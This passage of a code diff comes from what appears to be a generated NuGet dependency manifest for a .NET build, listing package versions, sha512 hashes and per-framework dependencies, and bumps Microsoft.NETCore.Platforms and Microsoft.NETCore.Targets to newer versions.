"System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net5.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net6.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "net7.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "net8.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "net9.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"], "netstandard2.1": ["Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Memory", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions", "System.Buffers", "System.Numerics.Vectors"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.CodeAnalysis.CSharp", "id": "Microsoft.CodeAnalysis.CSharp", "version": "4.12.0", "sha512": "sha512-Dbb/taxFill9/+2HRJufXW3udAtJaQw3+LzbWTDyYx7Z02HVdU5ydMXXTqg5lFgSmLDNBe+B8jRuI2eYw8OBOA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net462": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net47": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net471": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net472": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net48": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net5.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net6.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net7.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "net8.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "net9.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netstandard2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.CodeAnalysis.CSharp.Workspaces", "id": "Microsoft.CodeAnalysis.CSharp.Workspaces", "version": "4.12.0", "sha512": "sha512-YwFqDAYHJrf02FyGU8nQnaWNryZXuDV0r8pVgWjRtxAFDWfaU5CZxvU/4NsS6GSnEsWp6W/e49QMHsDXTJW/KA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net462": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net47": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net471": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net472": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net48": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net5.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net6.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net7.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Reflection.Metadata", "System.Threading.Channels"], "net8.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Reflection.Metadata", "System.Threading.Channels"], "net9.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Reflection.Metadata", "System.Threading.Channels"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netstandard2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"]}, "targeting_pack_overrides": [], "framework_list": []}, @@ -27,47 +27,47 @@ def main(): {"name": "Microsoft.Extensions.ObjectPool", "id": "Microsoft.Extensions.ObjectPool", "version": "9.0.0", "sha512": "sha512-dY64S9XmssfAjwvuGMHleFj2cKIhIFUU2D+Kr1D1Y+92mAPN/39HQMJay2FHxSRcDEI9hATivRV/I1N7QxVJcQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.NET.StringTools", "id": "Microsoft.NET.StringTools", "version": "17.12.6", "sha512": "sha512-uCT/G0W1wUteqfrriWHfLfFmArka8ISo6nUkC5gQzYZYm2PSTuqfS14DEsY0gqDuQpcLLLaYTDcEM0SA2Za5vA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net5.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net7.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net8.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.NET.Test.Sdk", "id": "Microsoft.NET.Test.Sdk", "version": "17.12.0", "sha512": "sha512-hGf8I8+yo15etavoMd+7OXcOG6/G7HYPDEJg5aQnhMzsxaUpq+udNZzSxmEN9rGTWMZOAVFcyNXNL7YBsN6chw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": ["Microsoft.CodeCoverage"], "net47": ["Microsoft.CodeCoverage"], "net471": ["Microsoft.CodeCoverage"], "net472": ["Microsoft.CodeCoverage"], "net48": ["Microsoft.CodeCoverage"], "net5.0": ["Microsoft.TestPlatform.TestHost", "Microsoft.CodeCoverage"], "net6.0": ["Microsoft.TestPlatform.TestHost", "Microsoft.CodeCoverage"], "net7.0": ["Microsoft.TestPlatform.TestHost", "Microsoft.CodeCoverage"], "net8.0": ["Microsoft.TestPlatform.TestHost", "Microsoft.CodeCoverage"], "net9.0": ["Microsoft.TestPlatform.TestHost", "Microsoft.CodeCoverage"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": ["Microsoft.TestPlatform.TestHost", "Microsoft.CodeCoverage"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.NETCore.Platforms", "id": "Microsoft.NETCore.Platforms", "version": "1.1.1", "sha512": "sha512-mDUJD1eLXIzmUnWCzWlmNQZGDp/cVGT8KyhzMcJNk2nlfdFUOoZai9idT8/FacJr8Nv8zhAmdf39FHm5qWUoGQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.NETCore.Targets", "id": "Microsoft.NETCore.Targets", "version": "1.1.3", "sha512": "sha512-pxwq8g2PYRiEF5KXVjmZFMNTqsg2Gr1puv/pR1sqAduAKHAGbaCuJ6+yc3pAJseClQUD29S2Ubrm7n/ZD78dUg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.NETCore.Platforms", "id": "Microsoft.NETCore.Platforms", "version": "7.0.4", "sha512": "sha512-mcQWjuDBh4WHGG4WcBI0k025WAdA2afMm6fs42sm1f+3gRyNQUiuMVT5gAWNUGSHmlu6qn/TCnAQpfl4Gm6cBw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.NETCore.Targets", "id": "Microsoft.NETCore.Targets", "version": "5.0.0", "sha512": "sha512-hYHm3JAjQO/nySxcl1EpZhYEW+2P3H1eLZNr+QxgO5TnLS6hqtfi5WchjQzjid45MYmhy2X7IOmcWtDP4fpMGw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.TestPlatform.ObjectModel", "id": "Microsoft.TestPlatform.ObjectModel", "version": "17.12.0", "sha512": "sha512-klsXMgAPNWYo3ceakLkod4wYrk4lAV2Ehi676zUKgiVpQ5Yj6q3vsMhk/3pm97Ltk/hdcSW0rJKJvcQvTzPgYA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Reflection.Metadata"], "net462": ["System.Reflection.Metadata"], "net47": ["System.Reflection.Metadata"], "net471": ["System.Reflection.Metadata"], "net472": ["System.Reflection.Metadata"], "net48": ["System.Reflection.Metadata"], "net5.0": ["System.Reflection.Metadata"], "net6.0": ["System.Reflection.Metadata"], "net7.0": ["System.Reflection.Metadata"], "net8.0": ["System.Reflection.Metadata"], "net9.0": ["System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Reflection.Metadata"], "netcoreapp2.1": ["System.Reflection.Metadata"], "netcoreapp2.2": ["System.Reflection.Metadata"], "netcoreapp3.0": ["System.Reflection.Metadata"], "netcoreapp3.1": ["System.Reflection.Metadata"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Reflection.Metadata"], "netstandard2.1": ["System.Reflection.Metadata"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.TestPlatform.TestHost", "id": "Microsoft.TestPlatform.TestHost", "version": "17.12.0", "sha512": "sha512-gYM2BOGQvFEP2fZt61f3f5Gu+imL1G1bvGUrbJjpYcl66R6uzs5yESg0XMn8IgUgldz8RldOOaYmjk2KcSeG1Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.TestPlatform.ObjectModel", "Newtonsoft.Json"], "net6.0": ["Microsoft.TestPlatform.ObjectModel", "Newtonsoft.Json"], 